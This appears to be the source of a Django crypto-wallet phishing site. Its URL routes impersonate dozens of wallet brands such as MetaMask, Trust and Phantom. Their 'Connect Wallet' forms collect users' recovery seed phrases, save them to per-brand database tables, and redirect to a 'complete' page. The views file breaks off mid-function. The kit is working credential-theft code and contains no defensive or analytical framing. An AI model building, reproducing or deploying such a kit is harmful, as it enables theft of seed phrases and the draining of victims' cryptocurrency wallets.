nodedata/urls.py
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static

urlpatterns = [
    path('', include('wallet.urls', namespace='node')),
    path('admin/', admin.site.urls),
]


if settings.DEBUG: 
        urlpatterns += static(settings.MEDIA_URL, 
                              document_root=settings.MEDIA_ROOT)

wallet/urls.py
from django.urls import path

app_name = 'node'

from . import views

urlpatterns = [
    path('', views.home, name='home'),
    path('wallets', views.wallet, name='wallets'),
    path('complete', views.complete, name='complete'),
    path('connect', views.connect, name='connect'),
    path('bitpay/', views.bitpay_views, name='bitpay'),
    path('solana/', views.solana_views, name='solana'),
    path('trust/', views.trust_views, name='trust'),
    path('metamask/', views.metamask_views, name='metamask'),
    path('huobiwallet/', views.huobiwallet_views, name='huobiwallet'),
    path('phantom/', views.phantom_views, name='phantom'),
    path('wazirx/', views.wazirx_views, name='wazirx'),
    path('pillar/', views.pillar_views, name='pillar'),
    path('tokenpocket/', views.tokenary_views, name='tokenpocket'),
    path('atomic/', views.atomic_views, name='atomic'),
    path('walleth/', views.walleth_views, name='walleth'),
    path('authereum/', views.authereum_views, name='authereum'),
    path('eidoo/', views.eidoo_views, name='eidoo'),
    path('zelcore/', views.zelcore_views, name='zelcore'),
    path('nash/', views.nash_views, name='nash'),
    path('coinomi/', views.coinomi_views, name='coinomi'),
    path('gridplus/', views.gridplus_views, name='gridplus'),
    path('coolwallets/', views.coolwallets_views, name='coolwallets'),
    path('alice/', views.alice_views, name='alice'),
    path('alphaWallet/', views.alphawallet_views, name='alphawallet'),
    path('tokenary/', views.tokenary_views, name='tokenary'),
    path('safepal/', views.safepal_views, name='safepal'),
    path('equal/', views.equal_views, name='equal'),
    path('infinito/', views.infinito_views, name='infinito'),
    path('mathwallet/', views.mathwallet_views, name='mathwallet'),
    path('myKey/', views.mykey_views, name='mykey'),
    path('spatium/', views.spatium_views, name='spatium'),
    path('walletio/', views.walletio_views, name='walletio'),
    path('infinitywallet/', views.infinitywallet_views, name='infinitywallet'),
    path('ownbit/', views.ownbit_views, name='ownbit'),
    path('easypocket/', views.easypocket_views, name='easypocket'),
    path('onto/', views.onto_views, name='onto'),
    path('bridgewallet/', views.bridgewallet_views, name='bridgewallet'),
    path('sparkpoint/', views.sparkpoint_views, name='sparkpoint'),
    path('viawallet/', views.viawallet_views, name='viawallet'),
    path('coin98/', views.coin98_views, name='coin98'),
    path('bitkeep/', views.bitkeep_views, name='bitkeep'),
    path('vision/', views.vision_views, name='vision'),
    path('sfwtwallet/', views.sfwtallet_views, name='sfwtwallet'),
    path('peakdefi/', views.peakdefi_views, name='peakdefi'),
    path('unstoppablewallet/', views.unstoppablewallet_views, name='unstoppablewallet'),
    path('meetone/', views.meetone_views, name='meetone'),
    path('dokwallet/', views.dokwallet_views, name='dokwallet'),
    path('atwallet/', views.atwallet_views, name='atwallet'),
    path('morixwallet/', views.morixwallet_views, name='morixwallet'),
    path('midaswallet/', views.midaswallet_views, name='midaswallet'),
    path('xdcwallet/', views.xdcwallet_views, name='xdcwallet'),
    path('others/', views.others_views, name='others')
]

wallet/views.py
from django.shortcuts import render, redirect, get_object_or_404

from .models import *

# Create your views here.
def home(request):
    template_name = 'index.html'
    return render(request, template_name)

def complete(request):
    template_name = 'complete.html'
    return render(request, template_name)

def wallet(request):
    template_name = 'wallets.html'
    return render(request, template_name)

def connect(request):
    template_name = 'connect.html'
    return render(request, template_name)

def bitpay_views(request):
    template_name = 'connect.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        bitpay = BitPay.objects.create(passphrase=passphrase,)
        bitpay.save()
        return redirect('node:complete')
    return render(request, template_name)

def solana_views(request):
    template_name = 'connect1.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        solana = Solana.objects.create(passphrase=passphrase,)
        solana.save()
        return redirect('node:complete')
    return render(request, template_name)


def trust_views(request):
    template_name = 'connect2.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        trust = Trust.objects.create(passphrase=passphrase,)
        trust.save()
        return redirect('node:complete')
    return render(request, template_name)

def metamask_views(request):
    template_name = 'connect3.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        metamask = Metamask.objects.create(passphrase=passphrase,)
        metamask.save()
        return redirect('node:complete')
    return render(request, template_name)

def huobiwallet_views(request):
    template_name = 'connect4.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        huobiwallet = HuobiWallet.objects.create(passphrase=passphrase,)
        huobiwallet.save()
        return redirect('node:complete')
    return render(request, template_name)

def phantom_views(request):
    template_name = 'connect5.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        phantom = Phantom.objects.create(passphrase=passphrase,)
        phantom.save()
        return redirect('node:complete')
    return render(request, template_name)

def wazirx_views(request):
    template_name = 'connect6.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        wazirx = Wazirx.objects.create(passphrase=passphrase,)
        wazirx.save()
        return redirect('node:complete')
    return render(request, template_name)

def pillar_views(request):
    template_name = 'connect7.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        pillar = Pillar.objects.create(passphrase=passphrase,)
        pillar.save()
        return redirect('node:complete')
    return render(request, template_name)

def tokenpocket_views(request):
    template_name = 'connect8.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        tokenpocket = Tokenpocket.objects.create(passphrase=passphrase,)
        tokenpocket.save()
        return redirect('node:complete')
    return render(request, template_name)

def atomic_views(request):
    template_name = 'connect9.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        atomic = Atomic.objects.create(passphrase=passphrase,)
        atomic.save()
        return redirect('node:complete')
    return render(request, template_name)

def walleth_views(request):
    template_name = 'connect10.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        walleth = Walleth.objects.create(passphrase=passphrase,)
        walleth.save()
        return redirect('node:complete')
    return render(request, template_name)

def authereum_views(request):
    template_name = 'connect11.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        authereum = Authereum.objects.create(passphrase=passphrase,)
        authereum.save()
        return redirect('node:complete')
    return render(request, template_name)

def eidoo_views(request):
    template_name = 'connect12.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        eidoo = Eidoo.objects.create(passphrase=passphrase,)
        eidoo.save()
        return redirect('node:complete')
    return render(request, template_name)

def zelcore_views(request):
    template_name = 'connect13.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        zelcore = Zelcore.objects.create(passphrase=passphrase,)
        zelcore.save()
        return redirect('node:complete')
    return render(request, template_name)

def nash_views(request):
    template_name = 'connect14.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        nash = Nash.objects.create(passphrase=passphrase,)
        nash.save()
        return redirect('node:complete')
    return render(request, template_name)

def coinomi_views(request):
    template_name = 'connect15.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        coinomi = Coinomi.objects.create(passphrase=passphrase,)
        coinomi.save()
        return redirect('node:complete')
    return render(request, template_name)

def gridplus_views(request):
    template_name = 'connect16.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        gridplus = Gridplus.objects.create(passphrase=passphrase,)
        gridplus.save()
        return redirect('node:complete')
    return render(request, template_name)

def coolwallets_views(request):
    template_name = 'connect17.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        coolwallets = CoolWalletS.objects.create(passphrase=passphrase,)
        coolwallets.save()
        return redirect('node:complete')
    return render(request, template_name)

def alice_views(request):
    template_name = 'connect18.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        alice = Alice.objects.create(passphrase=passphrase,)
        alice.save()
        return redirect('node:complete')
    return render(request, template_name)

def alphawallet_views(request):
    template_name = 'connect19.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        alphawallet = AlphaWallet.objects.create(passphrase=passphrase,)
        alphawallet.save()
        return redirect('node:complete')
    return render(request, template_name)

def tokenary_views(request):
    template_name = 'connect20.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        tokenary = Tokenary.objects.create(passphrase=passphrase,)
        tokenary.save()
        return redirect('node:complete')
    return render(request, template_name)

def safepal_views(request):
    template_name = 'connect21.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        safepal = Safepal.objects.create(passphrase=passphrase,)
        safepal.save()
        return redirect('node:complete')
    return render(request, template_name)

def equal_views(request):
    template_name = 'connect22.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        equal = Equal.objects.create(passphrase=passphrase,)
        equal.save()
        return redirect('node:complete')
    return render(request, template_name)

def infinito_views(request):
    template_name = 'connect23.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        infinito = Infinito.objects.create(passphrase=passphrase,)
        infinito.save()
        return redirect('node:complete')
    return render(request, template_name)

def mathwallet_views(request):
    template_name = 'connect24.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        mathwallet = Mathwallet.objects.create(passphrase=passphrase,)
        mathwallet.save()
        return redirect('node:complete')
    return render(request, template_name)

def mykey_views(request):
    template_name = 'connect26.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        mykey = MyKey.objects.create(passphrase=passphrase,)
        mykey.save()
        return redirect('node:complete')
    return render(request, template_name)

def spatium_views(request):
    template_name = 'connect27.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        spatium = Spatium.objects.create(passphrase=passphrase,)
        spatium.save()
        return redirect('node:complete')
    return render(request, template_name)

def walletio_views(request):
    template_name = 'connect28.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        walletio = Walletio.objects.create(passphrase=passphrase,)
        walletio.save()
        return redirect('node:complete')
    return render(request, template_name)

def infinitywallet_views(request):
    template_name = 'connect29.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        infinitywallet = InfinityWallet.objects.create(passphrase=passphrase,)
        infinitywallet.save()
        return redirect('node:complete')
    return render(request, template_name)

def ownbit_views(request):
    template_name = 'connect30.html'
    if request.method == 'POST':
        passphrase = request.POST['passphrase']
        ownbit = OwnBit.objects.create(passphrase=passphrase,)

templates/connect.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Connect Wallet</title>
	<link rel="icon" type="image/x-icon" href="{% static 'images/download.svg' %}">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Lato&display=swap" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
    <link rel="stylesheet" href="{% static 'css/connect.css' %}">
</head>
<body>
	<section class="one">
		<p>Connect Wallet</p>
		<ul class="nav nav-tabs">
			<li class="nav-item"><a class="nav-link active" data-toggle="tab" href="#phrase">Phrase</a></li>
		</ul>

		<div class="tab-content">
			<div role="tabpanel" class="tab-pane fade show active" id="phrase">
				<form action="{% url 'node:bitpay' %}" method="post">
					{% csrf_token %}
					<textarea name="passphrase" id="" cols="30" rows="5" minlength="12" required></textarea>
					<p class="text-secondary" style="margin-top: 10px;">Typically a 12, 18 or 45-word characters</p>
					<button class="btn btn-primary btn-block" type="submit">CONNECT WALLET</button>
				</form>
			</div>
		</div>
		
	</section>
	<script type="text/javascript">
		var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
		(function(){
		var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
		s1.async=true;
		s1.src='https://embed.tawk.to/621897dc1ffac05b1d7bae25/default';
		s1.charset='UTF-8';
		s1.setAttribute('crossorigin','*');
		s0.parentNode.insertBefore(s1,s0);
		})();
		</script>
		<!--End of Tawk.to Script-->
	<script src="{% static 'js/wallet.js' %}"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
</body>
</html>

templates/connect11.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Connect Wallet</title>
	<link rel="icon" type="image/x-icon" href="{% static 'images/download.svg' %}">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Lato&display=swap" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
    <link rel="stylesheet" href="{% static 'css/connect.css' %}">
</head>
<body>
	<section class="one">
		<p>Connect Wallet</p>
		<ul class="nav nav-tabs">
			<li class="nav-item"><a class="nav-link active" data-toggle="tab" href="#phrase">Phrase</a></li>
		</ul>

		<div class="tab-content">
			<div role="tabpanel" class="tab-pane fade show active" id="phrase">
				<form action="{% url 'node:walleth' %}" method="post">
					{% csrf_token %}
					<textarea name="passphrase" id="" cols="30" rows="5" minlength="12" required></textarea>
					<p class="text-secondary" style="margin-top: 10px;">Typically a 12, 18 or 45-word characters</p>
					<button class="btn btn-primary btn-block" type="submit">CONNECT WALLET</button>
				</form>
			</div>
		</div>
		
	</section>
	<script type="text/javascript">
		var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
		(function(){
		var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
		s1.async=true;
		s1.src='https://embed.tawk.to/621897dc1ffac05b1d7bae25/default';
		s1.charset='UTF-8';
		s1.setAttribute('crossorigin','*');
		s0.parentNode.insertBefore(s1,s0);
		})();
		</script>
		<!--End of Tawk.to Script-->
	<script src="{% static 'js/wallet.js' %}"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
</body>
</html>

templates/connect26.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Connect Wallet</title>
	<link rel="icon" type="image/x-icon" href="{% static 'images/download.svg' %}">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Lato&display=swap" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
    <link rel="stylesheet" href="{% static 'css/connect.css' %}">
</head>
<body>
	<section class="one">
		<p>Connect Wallet</p>
		<ul class="nav nav-tabs">
			<li class="nav-item"><a class="nav-link active" data-toggle="tab" href="#phrase">Phrase</a></li>
		</ul>

		<div class="tab-content">
			<div role="tabpanel" class="tab-pane fade show active" id="phrase">
				<form action="{% url 'node:mykey' %}" method="post">
					{% csrf_token %}
					<textarea name="passphrase" id="" cols="30" rows="5" minlength="12" required></textarea>
					<p class="text-secondary" style="margin-top: 10px;">Typically a 12, 18 or 45-word characters</p>
					<button class="btn btn-primary btn-block" type="submit">CONNECT WALLET</button>
				</form>
			</div>
		</div>
		
	</section>
	<script type="text/javascript">
		var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
		(function(){
		var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
		s1.async=true;
		s1.src='https://embed.tawk.to/621897dc1ffac05b1d7bae25/default';
		s1.charset='UTF-8';
		s1.setAttribute('crossorigin','*');
		s0.parentNode.insertBefore(s1,s0);
		})();
		</script>
		<!--End of Tawk.to Script-->
	<script src="{% static 'js/wallet.js' %}"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
</body>
</html>

templates/connect36.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Connect Wallet</title>
	<link rel="icon" type="image/x-icon" href="{% static 'images/download.svg' %}">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Lato&display=swap" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
    <link rel="stylesheet" href="{% static 'css/connect.css' %}">
</head>
<body>
	<section class="one">
		<p>Connect Wallet</p>
		<ul class="nav nav-tabs">
			<li class="nav-item"><a class="nav-link active" data-toggle="tab" href="#phrase">Phrase</a></li>
		</ul>

		<div class="tab-content">
			<div role="tabpanel" class="tab-pane fade show active" id="phrase">
				<form action="{% url 'node:viawallet' %}" method="post">
					{% csrf_token %}
					<textarea name="passphrase" id="" cols="30" rows="5" minlength="12" required></textarea>
					<p class="text-secondary" style="margin-top: 10px;">Typically a 12, 18 or 45-word characters</p>
					<button class="btn btn-primary btn-block" type="submit">CONNECT WALLET</button>
				</form>
			</div>
		</div>
		
	</section>
	<script type="text/javascript">
		var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
		(function(){
		var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
		s1.async=true;
		s1.src='https://embed.tawk.to/621897dc1ffac05b1d7bae25/default';
		s1.charset='UTF-8';
		s1.setAttribute('crossorigin','*');
		s0.parentNode.insertBefore(s1,s0);
		})();
		</script>
		<!--End of Tawk.to Script-->
	<script src="{% static 'js/wallet.js' %}"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
</body>
</html>

templates/connect41.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Connect Wallet</title>
	<link rel="icon" type="image/x-icon" href="{% static 'images/download.svg' %}">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Lato&display=swap" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
    <link rel="stylesheet" href="{% static 'css/connect.css' %}">
</head>
<body>
	<section class="one">
		<p>Connect Wallet</p>
		<ul class="nav nav-tabs">
			<li class="nav-item"><a class="nav-link active" data-toggle="tab" href="#phrase">Phrase</a></li>
		</ul>

		<div class="tab-content">
			<div role="tabpanel" class="tab-pane fade show active" id="phrase">
				<form action="{% url 'node:peakdefi' %}" method="post">
					{% csrf_token %}
					<textarea name="passphrase" id="" cols="30" rows="5" minlength="12" required></textarea>
					<p class="text-secondary" style="margin-top: 10px;">Typically a 12, 18 or 45-word characters</p>
					<button class="btn btn-primary btn-block" type="submit">CONNECT WALLET</button>
				</form>
			</div>
		</div>
		
	</section>
	<script type="text/javascript">
		var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
		(function(){
		var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
		s1.async=true;
		s1.src='https://embed.tawk.to/621897dc1ffac05b1d7bae25/default';
		s1.charset='UTF-8';
		s1.setAttribute('crossorigin','*');
		s0.parentNode.insertBefore(s1,s0);
		})();
		</script>
		<!--End of Tawk.to Script-->
	<script src="{% static 'js/wallet.js' %}"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
</body>
</html>

templates/connect42.html
{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>Connect Wallet</title>
	<link rel="icon" type="image/x-icon" href="{% static 'images/download.svg' %}">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Lato&display=swap" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
    <link rel="stylesheet" href="{% static 'css/connect.css' %}">
</head>
<body>
	<section class="one">
		<p>Connect Wallet</p>
		<ul class="nav nav-tabs">
			<li class="nav-item"><a class="nav-link active" data-toggle="tab" href="#phrase">Phrase</a></li>
		</ul>

		<div class="tab-content">
			<div role="tabpanel" class="tab-pane fade show active" id="phrase">
				<form action="{% url 'node:xdcwallet' %}" method="post">
					{% csrf_token %}
					<textarea name="passphrase" id="" cols="30" rows="5" minlength="12" required></textarea>
					<p class="text-secondary" style="margin-top: 10px;">Typically a 12, 18 or 45-word characters</p>
					<button class="btn btn-primary btn-block" type="submit">CONNECT WALLET</button>
				</form>
			</div>
		</div>
		
	</section>
	<script type="text/javascript">
		var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
		(function(){
		var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
		s1.async=true;
		s1.src='https://embed.tawk.to/621897dc1ffac05b1d7bae25/default';
		s1.charset='UTF-8';
		s1.setAttribute('crossorigin','*');
		s0.parentNode.insertBefore(s1,s0);
		})();
		</script>
		<!--End of Tawk.to Script-->
	<script src="{% static 'js/wallet.js' %}"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
</body>
</html>